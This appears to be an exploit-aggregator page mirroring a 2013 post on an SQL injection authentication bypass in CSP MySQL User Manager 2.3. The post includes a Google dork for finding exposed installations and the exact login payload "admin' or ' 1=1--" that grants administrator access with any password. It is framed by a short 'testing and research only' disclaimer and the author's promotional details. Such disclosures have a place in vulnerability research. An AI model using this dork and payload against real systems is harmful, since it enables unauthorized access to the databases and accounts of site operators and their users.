CSP MySQL User Manager 2.3 SQL Injection

CVE	Category	Price	Severity
N/A	CWE-89	N/A	High

Author	Risk	Exploitation Type	Date
N/A	High	Remote	2014-01-09

CPE
cpe:cpe:/a:mysql:mysql-user-manager:2.3

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2014010045

Below is a copy:

# Exploit Title: CSP MySQL User Manager v2.3 SQL Injection 
Authentication Bypass
# Google Dork: intitle:"CSP MySQL User Manager"
# Date: 8/1/2013
# Exploit Author: Youssef mami
# Vendor Homepage: https://code.google.com/p/cspmum/
# Software Link: 
https://code.google.com/p/cspmum/downloads/detail?name=cmum-23.zip&can=2&q=
# Version: 2.3
# Tested on: Linux 2.6.38-11
# CVE : nothing
##################################################################################
.__                                                  __
|  |__ _____    _____   _____ _____    _____   _____/  |_
|  |  \\__  \  /     \ /     \\__  \  /     \_/ __ \   __\
|   Y  \/ __ \|  Y Y  \  Y Y  \/ __ \|  Y Y  \  ___/|  |
|___|  (____  /__|_|  /__|_|  (____  /__|_|  /\___  >__|
      \/     \/      \/      \/     \/      \/     \/
.__        _____                            __  .__
|__| _____/ ____\___________  _____ _____ _/  |_|__| ________ __   ____
|  |/    \   __\/  _ \_  __ \/     \\__  \\   __\  |/ ____/  |  \_/ __ \
|  |   |  \  | (  <_> )  | \/  Y Y  \/ __ \|  | |  < <_|  |  |  /\  ___/
|__|___|  /__|  \____/|__|  |__|_|  (____  /__| |__|\__   |____/  \___  
 >
         \/                        \/     \/            |__|           \/
                           .__
   ______ ______________  _|__| ____  ____   ______
  /  ___// __ \_  __ \  \/ /  |/ ___\/ __ \ /  ___/
  \___ \\  ___/|  | \/\   /|  \  \__\  ___/ \___ \
/____  >\___  >__|    \_/ |__|\___  >___  >____  >
      \/     \/                    \/    \/     \/


##################################################################################
SQL Injection Authentication Bypass
Product Page: 
https://code.google.com/p/cspmum/downloads/detail?name=cmum-23.zip&can=2&q=


Author(Pentester): Youssef mami ([email protected])
On Web: www.hammamet-services.com and http://hiservices.blogspot.com ( 
our blog )
On Social: www.facebook.com/hammamet.informatique and 
https://twitter.com/hammamet_info
##################################################################################
we just need to input admin login like this : admin' or ' 1=1-- and any 
password :-)
login : admin' or ' 1=1--
password: hammamet informatique services

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum